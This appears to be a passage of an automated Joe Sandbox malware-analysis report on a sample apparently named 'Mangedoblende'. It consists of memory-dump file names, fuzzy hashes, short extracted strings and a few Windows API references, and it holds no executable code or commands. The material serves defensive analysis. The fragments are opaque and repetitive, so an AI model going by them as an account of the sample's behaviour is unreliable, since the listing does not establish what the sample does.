• Instruction ID: f7d0deb6a330caeb4cc9659127f2f15fd68c904fdf2a9c21b7af38c8e79bc55f
• Opcode Fuzzy Hash: 7399bbd5a2f57174129faac221e9dadad7aab59db599c0bf7a61c8b598d39224
• Instruction Fuzzy Hash: 02D18D78E05318CFDB15DFA5C984B9DBBB2BF89300F2081A9D408AB265DB349E81DF50
Memory Dump Source
• Source File: 00000006.00000002.3350893219.00000000227A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 227A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_227a0000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23a321f2f9cf19bb187fc3817fa95098253e441f632365ab2b96912b95feeb7f
• Instruction ID: aaf96e43254fd679e1c654a10cacc9953a7016f6193f4dfd1ab0f82ad5d9e702
• Opcode Fuzzy Hash: 23a321f2f9cf19bb187fc3817fa95098253e441f632365ab2b96912b95feeb7f
• Instruction Fuzzy Hash: D8D1AE78E00618CFDB55DFA5C994B9DBBB2BF89300F5081A9D908AB365DB359E81CF10
Memory Dump Source
• Source File: 00000006.00000002.3350893219.00000000227A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 227A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_227a0000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a08abc2f7220252e55b038c2138ed77d9bf0dd92c8f5aad28be09292aceb273
• Instruction ID: 5ca638a4e682310abb99e1a0e4b193589682bc4790ed0e4271823622950ab59b
• Opcode Fuzzy Hash: 8a08abc2f7220252e55b038c2138ed77d9bf0dd92c8f5aad28be09292aceb273
• Instruction Fuzzy Hash: 50D1AE78E04318CFDB15DFA5C994B9DBBB2AF89300F5081A9D908AB369DB359D81CF50
Memory Dump Source
• Source File: 00000006.00000002.3350893219.00000000227A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 227A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_227a0000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b49d86350235eb21d5d90a1063f4ff1eae264dfda0a26d3ae0daf84626133b18
• Instruction ID: acdd13c0c5996f6e453e2dd89a7f46f2d1d2bb41212acf7f7f7fcdd4c767cc55
• Opcode Fuzzy Hash: b49d86350235eb21d5d90a1063f4ff1eae264dfda0a26d3ae0daf84626133b18
• Instruction Fuzzy Hash: F3C1C074E05218CFDB14DFA5C994B9DBBB2BF89305F2081AAD408AB365DB359E81CF50
Memory Dump Source
• Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 78ae1bed1f24ff08c309da5afd18a7e32c0a17e08991bb6bec2675e7f30529e5
• Instruction ID: 5c3d02df1a8edaecd048af6cd97bc2315e669f4848f6cb001f063539cf63199f
• Opcode Fuzzy Hash: 78ae1bed1f24ff08c309da5afd18a7e32c0a17e08991bb6bec2675e7f30529e5
• Instruction Fuzzy Hash: 3DC1AF74E04218CFDB14DFA5C984B9DBBB2AF89305F6081A9D409AB369DB359E85CF10
Memory Dump Source
• Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5b53a2220baeb2b366b7571b1fec63f40d8521aa3ded79e138807da44547e9f3
• Instruction ID: f4c60e2443c1e9ebd2ad7510046828d33374f4dba518a9b28a05aa1957c93a8e
• Opcode Fuzzy Hash: 5b53a2220baeb2b366b7571b1fec63f40d8521aa3ded79e138807da44547e9f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 4EC1A074E04218CFDB14DFA5C984B9DBBB2BF89305F6081A9D409AB369DB359E81CF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 345aa79df168c93eeb1ed2a8d9582886593565b640f2d5602e8b7bd38086decd
                                                                                                                                                                            • Instruction ID: 033866524df9e765f931c9e665e535cb644c8851a4bf74fdceb88603d3aaeec1
                                                                                                                                                                            • Opcode Fuzzy Hash: 345aa79df168c93eeb1ed2a8d9582886593565b640f2d5602e8b7bd38086decd
                                                                                                                                                                            • Instruction Fuzzy Hash: 6CC19E74E04218CFDB14DFA5C984B9DBBB2BF89305F1081AAD809A7369DB759E81CF11
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2e0a31e7d6b4eff9d1e9c18753acc5652908de42c07510bd15afca67937a09f2
                                                                                                                                                                            • Instruction ID: e86e7c673957263d13d8359cf9166a0ba6d22de1562659d99797ed7b570ee0d4
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e0a31e7d6b4eff9d1e9c18753acc5652908de42c07510bd15afca67937a09f2
                                                                                                                                                                            • Instruction Fuzzy Hash: F7A10570D00208CFDB14DFA9C984BDDBBB1FF88314F209269E509AB2A5DBB49985CF51
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d0b2534b604526a673741aa48f158330e437a2482e0e20675aa94d825d310a2e
                                                                                                                                                                            • Instruction ID: 0b5296f83f5b1a46efb20ce8e02fad636aaaf6f8fafed75719df9667bc2e47b8
                                                                                                                                                                            • Opcode Fuzzy Hash: d0b2534b604526a673741aa48f158330e437a2482e0e20675aa94d825d310a2e
                                                                                                                                                                            • Instruction Fuzzy Hash: 4091F270D00218CFDB10DFA8C984B9DBBB1FF49314F209669E509BB2A5DBB49985CF11
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2e08008276e1ec631960e801d9f1459392c3e897f7a89a34d41c630240965091
                                                                                                                                                                            • Instruction ID: ba43e15b6409e278923312d466c0d3e1919c33c12e9d8ac8a7c23c4912549b30
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e08008276e1ec631960e801d9f1459392c3e897f7a89a34d41c630240965091
                                                                                                                                                                            • Instruction Fuzzy Hash: DB81C474E00618CFDB05DFA9C980ADDBBB2FF88300F608169D404AB369DB399946DF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a92fe7128cf0c859b5b9ecc4b13c4fadd8071a856afed111f5e2352399210dcd
                                                                                                                                                                            • Instruction ID: 5340c7ac91ce8ec84ec022e84f6ca19dd2f602d1c7f64daa9eb33d942b4de14d
                                                                                                                                                                            • Opcode Fuzzy Hash: a92fe7128cf0c859b5b9ecc4b13c4fadd8071a856afed111f5e2352399210dcd
                                                                                                                                                                            • Instruction Fuzzy Hash: 4081C578E00618CFDB05DFA9C980B9DBBB2FF88300F608169D404AB369DB359941DF54
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f1803015eb90b51fb66d64725acd8d88a693eaa5bc1f7d529c4db14f870b0180
                                                                                                                                                                            • Instruction ID: ba731865d6ac270e1f94ef51be07bf2885966817eb2fd90e6571af504abe0b6e
                                                                                                                                                                            • Opcode Fuzzy Hash: f1803015eb90b51fb66d64725acd8d88a693eaa5bc1f7d529c4db14f870b0180
                                                                                                                                                                            • Instruction Fuzzy Hash: 1781D578E00618CFDB05DFA9C990BADBBB2FF88300F608169D404AB369DB359942DF54
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 16b8ac38db09cfd65d37b821f2785307e26ee55d2e3f0c5d6874a2c35a8c3f7f
                                                                                                                                                                            • Instruction ID: 13cb740b8e25f4f5cc5df8ae0d3572363d09d20b8dce031d052b8898add411fc
                                                                                                                                                                            • Opcode Fuzzy Hash: 16b8ac38db09cfd65d37b821f2785307e26ee55d2e3f0c5d6874a2c35a8c3f7f
                                                                                                                                                                            • Instruction Fuzzy Hash: D1519474E04608DFDB19DFAAD984A9DBBF2FF89300F248029E815AB365DB349941CF14
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7057c4a6ccbc3e608d4d70458f200c7039d4ec0989e90e628375aa56ecc3a0c3
                                                                                                                                                                            • Instruction ID: 652e7ebf88c4b9d284dcdd8ad75e71ce128038adf8de884604564ece47baf42c
                                                                                                                                                                            • Opcode Fuzzy Hash: 7057c4a6ccbc3e608d4d70458f200c7039d4ec0989e90e628375aa56ecc3a0c3
                                                                                                                                                                            • Instruction Fuzzy Hash: 7751A274E04608DFDB19DFAAD984A9DBBF2FF89300F248029E815AB365DB349941CF14
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3c6fc9bb56f2c210452d7f3b093329b9eb418de269834429d20358521447b9b9
                                                                                                                                                                            • Instruction ID: c1e0bdbfdfb815b1224c553c6b3172c63389fb834f459d6099720f7fbede8534
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c6fc9bb56f2c210452d7f3b093329b9eb418de269834429d20358521447b9b9
                                                                                                                                                                            • Instruction Fuzzy Hash: B64122B4D04368CFDB18CFAAD9546DDBBB2AF89300F10C06AC458AB2A5DB349946CF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 28e08b859c88d394501291193e554cd549a88992d1723befd4f20b70e97a6f87
                                                                                                                                                                            • Instruction ID: 4e2257fc9aec6930994ef0f30ceb0d1c32b483fececf8af1be8d069216cdd4c9
                                                                                                                                                                            • Opcode Fuzzy Hash: 28e08b859c88d394501291193e554cd549a88992d1723befd4f20b70e97a6f87
                                                                                                                                                                            • Instruction Fuzzy Hash: 1D51D2B1D00618CBEB18DFAAC9447DDBBF2AF89304F14C16AC418BB2A5DB754986CF10
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fdddd97250040de82560c05c2ab4876b690f8da2d971b4280d208e9e801ab5dc
                                                                                                                                                                            • Instruction ID: 3dff3c6ac599d753a9832fc8d6b2ff3c4710f6e236c6c35e1ae1473d98f7bd74
                                                                                                                                                                            • Opcode Fuzzy Hash: fdddd97250040de82560c05c2ab4876b690f8da2d971b4280d208e9e801ab5dc
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C41D174E002188BDB08CFAAD9547DEBBF2AF89300F10D16AD518BB264EB749946CF54
Memory Dump Source
• Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: (oeq$(oeq$(oeq$(oeq$(oeq$(oeq$,iq$,iq
• API String ID: 0-4181857939

APIs
• GetCurrentProcess.KERNEL32 ref: 229CC066
• GetCurrentThread.KERNEL32 ref: 229CC0A3
• GetCurrentProcess.KERNEL32 ref: 229CC0E0
• GetCurrentThreadId.KERNEL32 ref: 229CC139
Memory Dump Source
• Source File: 00000006.00000002.3351565896.00000000229C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 229C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_229c0000_Mangedoblende.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

APIs
• GetCurrentProcess.KERNEL32 ref: 229CC066
• GetCurrentThread.KERNEL32 ref: 229CC0A3
• GetCurrentProcess.KERNEL32 ref: 229CC0E0
• GetCurrentThreadId.KERNEL32 ref: 229CC139
Memory Dump Source
• Source File: 00000006.00000002.3351565896.00000000229C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 229C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_229c0000_Mangedoblende.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: Hiq$Hiq
• API String ID: 0-2624443307
Strings
Memory Dump Source
• Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: LReq$LReq
• API String ID: 0-1701832695
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: ,iq$,iq
• API String ID: 0-3242339887
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: Xiq$Xiq
• API String ID: 0-733771754
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: $eq$$eq
• API String ID: 0-2246304398
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: 4'eq$4'eq
• API String ID: 0-907361030
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: LReq
• API String ID: 0-2687900687
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID: (oeq
• API String ID: 0-952175256
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 22936E02
Memory Dump Source
• Source File: 00000006.00000002.3351450437.0000000022930000.00000040.00000800.00020000.00000000.sdmp, Offset: 22930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22930000_Mangedoblende.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 22936E02
Memory Dump Source
• Source File: 00000006.00000002.3351450437.0000000022930000.00000040.00000800.00020000.00000000.sdmp, Offset: 22930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22930000_Mangedoblende.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 229394F1
Memory Dump Source
• Source File: 00000006.00000002.3351450437.0000000022930000.00000040.00000800.00020000.00000000.sdmp, Offset: 22930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22930000_Mangedoblende.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
APIs
• OleInitialize.OLE32(00000000), ref: 2293B9CD
Memory Dump Source
• Source File: 00000006.00000002.3351450437.0000000022930000.00000040.00000800.00020000.00000000.sdmp, Offset: 22930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22930000_Mangedoblende.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 229CC2B7
Memory Dump Source
• Source File: 00000006.00000002.3351565896.00000000229C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 229C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_229c0000_Mangedoblende.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 229CC2B7
Memory Dump Source
• Source File: 00000006.00000002.3351565896.00000000229C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 229C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_229c0000_Mangedoblende.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• LdrInitializeThunk.NTDLL(00000000), ref: 225B9A6E
Memory Dump Source
• Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: b0b20451e5f27ef846d158850782fda060549b7ddc2e27e874d59a83f6dc00dd
                                                                                                                                                                            • Instruction ID: fd326b9648022a741eec9f9648f7bf2c7a06ad964a6667211f1b8c5592079ff8
                                                                                                                                                                            • Opcode Fuzzy Hash: b0b20451e5f27ef846d158850782fda060549b7ddc2e27e874d59a83f6dc00dd
                                                                                                                                                                            • Instruction Fuzzy Hash: FF116A74E042098FDB14DFA8D884EADBBB5FF89308F10C669E804A724AD774AA41CF10
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 2293B9CD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351450437.0000000022930000.00000040.00000800.00020000.00000000.sdmp, Offset: 22930000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22930000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                            • Opcode ID: cff75927cb7aa91ce31986c03d959c9316b1d1f028af4f0b6a19f944b2cd769d
                                                                                                                                                                            • Instruction ID: d522aa11034055658ec512d3dc4ebe25d923dd467f2b61d3817c2d2949f20944
                                                                                                                                                                            • Opcode Fuzzy Hash: cff75927cb7aa91ce31986c03d959c9316b1d1f028af4f0b6a19f944b2cd769d
                                                                                                                                                                            • Instruction Fuzzy Hash: A71103B5904348CFCB10DF9AD585B9EBBF8EB48324F208559D558A7200D378A944CBA5
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 2293B9CD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351450437.0000000022930000.00000040.00000800.00020000.00000000.sdmp, Offset: 22930000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22930000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                            • Opcode ID: 4a3bcdae51c8d3de64442f63338aa3bea2e24bc031427af8a6fcebbd38c92ffc
                                                                                                                                                                            • Instruction ID: 406f2f497fb48de31f78a0154c64ab48877d532368fe78743ffa3b91aad1bbc0
                                                                                                                                                                            • Opcode Fuzzy Hash: 4a3bcdae51c8d3de64442f63338aa3bea2e24bc031427af8a6fcebbd38c92ffc
                                                                                                                                                                            • Instruction Fuzzy Hash: EB1130B59042498FCB10DFAAC984BCEBFF4EF48324F24895AD558A7210C378A944CBA1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (oeq
                                                                                                                                                                            • API String ID: 0-952175256
                                                                                                                                                                            • Opcode ID: e32297949f4dea0c3e2f006b19acfb47df99b414dcf88e97fc4a656ffdd34c99
                                                                                                                                                                            • Instruction ID: 15bcc5e4d258495212705c5fb35135fd01558bf90bee13971ffc22cfa701e831
                                                                                                                                                                            • Opcode Fuzzy Hash: e32297949f4dea0c3e2f006b19acfb47df99b414dcf88e97fc4a656ffdd34c99
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D41DF31B042149FCB19AF69C854AAEBBF6AFCD310F24446AE916D7391CF359D01CBA1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq
                                                                                                                                                                            • API String ID: 0-1552367303
                                                                                                                                                                            • Opcode ID: bfefd150929abd821b051f55170d35565d2e15195def71f5dc92e2a5e2b866eb
                                                                                                                                                                            • Instruction ID: 8ec38943b93e8e6c3574b33194f8b04e7d14321ee54c3b405d84b98646cdae98
                                                                                                                                                                            • Opcode Fuzzy Hash: bfefd150929abd821b051f55170d35565d2e15195def71f5dc92e2a5e2b866eb
                                                                                                                                                                            • Instruction Fuzzy Hash: A54138756001059FDB15EF28C988AAE7BB6FF48310F51006AE905CB3A1CB34DE51CF92
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: F
                                                                                                                                                                            • API String ID: 0-2730988801
                                                                                                                                                                            • Opcode ID: 8f553a87c8c89e9d1c2c98e9391fe554acd755e7c589a72ec47b94ae125991c2
                                                                                                                                                                            • Instruction ID: 7fe5f13611209b11988d62856e593eb77b4179bf625d898b635f9abdac0444f7
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f553a87c8c89e9d1c2c98e9391fe554acd755e7c589a72ec47b94ae125991c2
                                                                                                                                                                            • Instruction Fuzzy Hash: DD313A74D092498FCB06EFA9C8446EDBFF5EF4A301F1041AAD844A7261EB341A95DFA1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 03ac6abf71c55b595f6239badd6259c51739fa2b285c7f171ff9da8260d9e786
                                                                                                                                                                            • Instruction ID: ec7819c0a70963cb651c57b373b59c470264998ba66593ef99881c685282615e
                                                                                                                                                                            • Opcode Fuzzy Hash: 03ac6abf71c55b595f6239badd6259c51739fa2b285c7f171ff9da8260d9e786
                                                                                                                                                                            • Instruction Fuzzy Hash: E31299380A1653DFE2412F25D6EC26EBA71FF4F323365AD06F10BC6054AB791469DB22
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
